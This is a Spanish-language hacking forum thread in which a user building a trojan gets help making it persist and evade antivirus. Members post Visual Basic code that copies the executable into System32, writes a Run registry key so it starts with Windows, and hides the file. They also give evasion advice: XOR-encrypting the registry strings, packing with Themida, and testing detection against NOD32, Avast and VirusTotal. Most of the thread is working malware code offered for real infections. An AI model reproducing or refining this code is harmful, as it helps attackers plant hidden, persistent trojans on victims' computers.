bueno... habiendo terminado un troyano... esta vez mas elaborado aunque con muy poquitas funciones... :S queria ya empezar a infectar... pero para eso necesito q cuando se ejecute el server se copie a alguna carpeta donde no lo enceuntren facil... como system o system32 y q se ejecute con windows....
alguno sabe como hacerlo?? desde ya muchas gracias
Vamos,no te vamos a dar todo hecho,algo tan sencillo como añadirse a run y copiarse a system...busca un poco antes de postear.
Ahora no tngo nada de tiempo,siento no poner code,pero esta en el foro.
Saludos.
bueno segui buscando y encontre la funcino para hacer q se ejecute con windows... la dejo aqui por si a alguien le hace falta:
usamos:
txtClave
txtExe
LabelInfo
CitarPrivate mReg As cQueryReg
Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
Dim s As String
'
s = mReg.GetRegString(cvRun, txtClave.Text)
If s <> "" Then
LabelInfo.Caption = "La clave ya estaba asignada." & vbCrLf & s
Else
If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then
LabelInfo.Caption = "La clave se ha asignado correctamente."
Else
LabelInfo.Caption = "ERROR al crear la clave."
End If
End If
no lo probe al codigo espero q ande... jeje
no encontre como hacer a q se copie a system... me dijeron q era algo con clon pero nada
por favor si alguno seria tan amable de acercarme el codigo o algun link se lo agradeceria mucho ;)
les dejo el link de donde saque la info
http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm (http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm)
lo tengoooooo XD
http://foro.elhacker.net/index.php/topic,151715.0.html (http://foro.elhacker.net/index.php/topic,151715.0.html)
para aquel q lo quiera ahi ta el link
s = mReg.GetRegString(cvRun, txtClave.Text)
no entiendo q tengo q poner en el txtClave??
dim clave as object
set clave=CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Trojan" ,"c:\windows\system32\" & "Troyano.exe"
y para copiarse:
Filecopy APP.apth & "\" & APP.exename & ".exe" ,"C:\WINDOWS\System32\troyano.exe"
Bueno ahi lo tienes.
Saludos.
muchas gracias..! ya lo pruebo ;)
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory que te va a dar como resutlado:
Citar<HD>:\<carpeta de Windows>\System32
Otra cosa que puedes hacer es ocultarlo a la vista del usuario, es decir, dejando el archivo como archivo oculto, con el comando SetAttr (http://msdn2.microsoft.com/en-us/library/a5wx7516(VS.80).aspx)
Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).
Un Saludo.
CitarEs un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory
En un modulo:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Formulario:
Private Sub Form_Load()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
Dim win
Dim sys
Longitud = 128
Es = GetWindowsDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
win = Camino
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
sys = Camino
End Sub
Un saludo ;)
CitarTambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).
me podrias decir como lo cifro las cadenas??
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??
Para lo de encriptacion de cadenas te dejo algo:
http://www.google.es/search?hl=es&client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hs=rQf&q=cifrar+cadenas+VB&btnG=B%C3%BAsqueda&meta=
http://foro.elhacker.net/index.php?topic=156434.0;prev_next=next
Citarsi yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??
Benru te a dado todo el codigo que necesitas.... :) :) Te lo recopilo un poquito:
En un modulo:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
En el formulario:
Dim system32 As String
Dim windows As String
Public Function RutaSystem32()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
Longitud = 128
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
system32 = Camino
End Function
Public Function RutaWindows()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
Longitud = 128
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
windows = Camino
End Function
Private Sub Form_Load()
RutaSystem32
MsgBox system32
End Sub
Un Saludo.
Citarsi yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??
No, no es necesaria. Pero recuerda que tendras que modificar el codigo, quedaria asi:
Private Sub Form_Load()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
Dim sys
Longitud = 128
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
sys = Camino
End Sub
Saludos
ok miren... lo de copiar a System32 tengo esto:
y funciana ;)
Modulo1
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Function System32() As String
Dim buf As String
Dim ret As Long
buf = String$(260, Chr$(0))
ret = GetSystemDirectory(buf, Len(buf))
System32 = Left$(buf, ret)
End Function
Form
Private Sub Form_Load()
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub
hasta ahi anda barbaro... no salta el antivirus ni nada... ahora en el form le agregue para q se ejecute y quedo asi:
form
Dim clave As Object
Private Sub Form_Load()
On Error GoTo Error
Set clave = CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\prueba.exe"
Error:
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub
y si... es como dice Hendrix. me lo detecta el AV.. ahora leo esos manuales... y despues dejo el code final aqui por si alguien lo necesita ;)
para ser sincero no entendi lo de cifrar... es como sustituir la direccion por una variable???
lo logreeeee bueno...
bueno les cuento lo puse como esta en el codigo anterior... y le pase el themida... y por lo menos el NOD32 no lo detecta...
pasa q me quedo re pesado ahora...
si me pudieran explicar bien como cifrar las cadenas xq no lo termine de enteder se los agradeceria muchisimo...
IGUALMENTE MUCHAS GRACIAS A TODOS!
toy feliz de este logro ;)
Le pasaste el AV sin comprimir con Themida?? O ya te lo detectaba??
El Themida incrementa mucho el tamaño de un archivo, intenta conseguir un troyano indetectable sin necesidad de recurrir a esto ultimo
salu2
cuando compilaba el exe saltaba el AV :(
ahora q le pase el themida no lo detecta... pero es mas lento... por ejemplo para mandar los screenshot tarda un monton y eso q tienen resolucion baja (20)
ninguno me puede explicar bien como cifro las cadenas??
porfa... tengo el server q pesa muchisimo y mucho mas lento
Ya te lo dije, tienes que buscar alguna funcion que encripte una cadena de texto, luego buscas la que lo desencripte, abres un proyecto nuevo en VB, pones la funcion encriptadora y ahces que aparezca el resutlado del texto encritpado en el textbox, lo copias y lo pones en la funcion que quieres ejecutar, pasandole la funcion desencriptadora....algo asi:
Kill "C:\archivo.exe"
Encritpas esto: C:\Archivo.exe
te queda asi: hgd5b5td4b
luego, pones esto:
kill funciondesencriptadora("hgd5b5td4b")
lo que hace esto es pasarle al comando kill, el argumento ya desencritpado, es decir, C:\archivo.exe
Un Saludo.
ahora entendi!! disculpen mi ignoracia!! XD
entonces lo q yo tengo q cifrar sera esto:
Clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\klass.exe"
y me quedaria algo asi:
Clave.regwrite funciondesencriptadora("djflsdflkasdf")
huyyy... q hago mal!!... por favor les pido q miren este codigo q hice:
poner un text1 y en el text1.text = "####$$&&***%/***"
lo q es igual a "agus" una vez desencripado
Dim Des As String
Function descifrar(Ruta As String)
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
End Function
Private Sub Command1_Click()
Des = descifrar(Text1.Text)
Text1.Text = Des
End Sub
ahora si prueban el codigo cuando le hacen click al boton... el text1 se borra y no deja ningun resultado... q hago mal?
Mira, te paso una fucnion mucho mas simple que eso, aki tienes:
Public Function crypt(j)
On Error Resume Next
For R = 1 To Len(j)
crypt = crypt & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function
Esta funcion cifra y descifra a la vez, ya que usa Xor.
Un Saludo. ;)
Para obtener la ruta de windows y de system32, mejor q andar usando la api es usar environ, por ej:
msgbox environ("WINDIR")
msgbox environ ("SYSTEMDIR")
La de system32 creo q era asi, q no me apetece provar :xD :xD
Hay mas llamadas como HOMEDRIVE para el disco C (comunmente claro ;)) o TMP para los temporales, tb hay otra para archivos de programa pero no me acuerdo ahora..
1S4ludo
Para la carpeta System32 no hay ninguna (que yo sepa), la otra que te da la carpeta de windows es %Systemroot%.
Temporales --> tmp
Archivos de programa --> Programfiles
Si quieres ver todas esas variables, ve a la consola, escribe set y pulsa enter....
Un Saludo. ;)
Da igual una q otra mira:
Private Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub
Ya lo se, tu habia puesto systemdir, que es incorrecto... ;) ;)
Un Saludo.
bien! al fin me anda el foro1 jeje hace horas q trato reponder...
CitarPrivate Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub
gracias EON por ese code... seguro lo uso en otro troyano para ahorrarme un modulo...
y hendrix.. en seguida pruebo esa funcion ;)
pero me podrias decir q hice mal en la q invente... ademas de q es complicada... me mata no poder hacer algo bien XD
Te e arreglado la tuya:
Dim Des As String
Public Function descifrar(Ruta As String) As String
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
descifrar = Ruta
End Function
Private Sub Command1_Click()
Des = descifrar("####$$&&***%/***")
MsgBox Des
End Sub
Eran errores muy basicos, conviene que te leas mas sobre VB antes de empezar a hacer segun que proyectos... :-\ :-\
Un Saludo.
gracias! me funciono re bien... perdon xq tarde en responder pero no me entraba el foro...
probe el server y lo sigue detectando... :( dice q intenta crear un archivo *.exe
creo q debe ser cuando se copia a system32
se puede cifrar esto?? como??
le dejo el code:
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\klass.exe"
Ruta = System32 & "\klass.exe"
el modulo es el q postie al principio
perodonen por tantas preguntas es q es la primera vez q hago esta parte de ltroyano... simpre hacia uno le pasaba el themida y solamente funcionaba hasta q apagaban la compu o lo borraban XD
PROBLEMA SOLUCIONADO EL DE ABAJO! DESPUES DE MODIFICARLO MILES DE VECES ME DI CUENTA Q ME FALTABAN DOS " XD
no me anda :@ no se xq ya probe miles de formas y codigos... porfavor diganme q hago mal... :S
Dim Clave As Object
Dim WINDOWS As String
Private Sub Form_Load()
WINDOWS = Environ(windir)
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\jeje.exe"
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%mbmb%+'%D=[mbmb)bb")
End Sub
Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function
eso se copia y se graba en el registro... pero cuando compilo el programa dice:
Error '5' en tiempo de ejecucion:
Llamada a procedimiento o argumentos no válidos
q es?? no entiendo... el codigo creo q esta bien... hice lo q Hendrix me dijo :huh:
bueno modifique el codigo cientos de veces... probe con nuevos proyectos... de todo... y creo q el error esta aca... pero no se como solucionarlo
Dim WINDOWS As String
WINDOWS = Environ(windir)
ahora me da error '450'
numero de argumentos erroneos o asignacion de propiedad no valida
esto me pone de mal humor.... :S
Dim WINDOWS As String
Dim Clave As Object
Private Sub Form_Load()
WINDOWS = Environ("windir")
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%wurbef%+'%D=[mbmb)bb")
End Sub
Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function
veran q todos los code son distintos ya q voy probando cambiando... haciendo nuevos proyectos -.-
bueno espero q alguien detecte el error por favor... esto ya me estallevando muchisimo tiempo
Bueno el error esta en el regwrite, de esta manera ya no es detectado por los AV por lo menos los del virustotal
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[") & "Klass", descifrar("d=[pnichpt[t~tsbj45[") & "Klass.exe"
si ya lo habia solucionado
muchas gracias de todos modos;)
igualmente el Avast me lo detecta :-\
a lo mejor es otra parte del code pero no creo ya q es todo hecho por mi... pero bueno... ya voy a probar como dijeron q el otro tema... cambiando las variables, las ordenes etc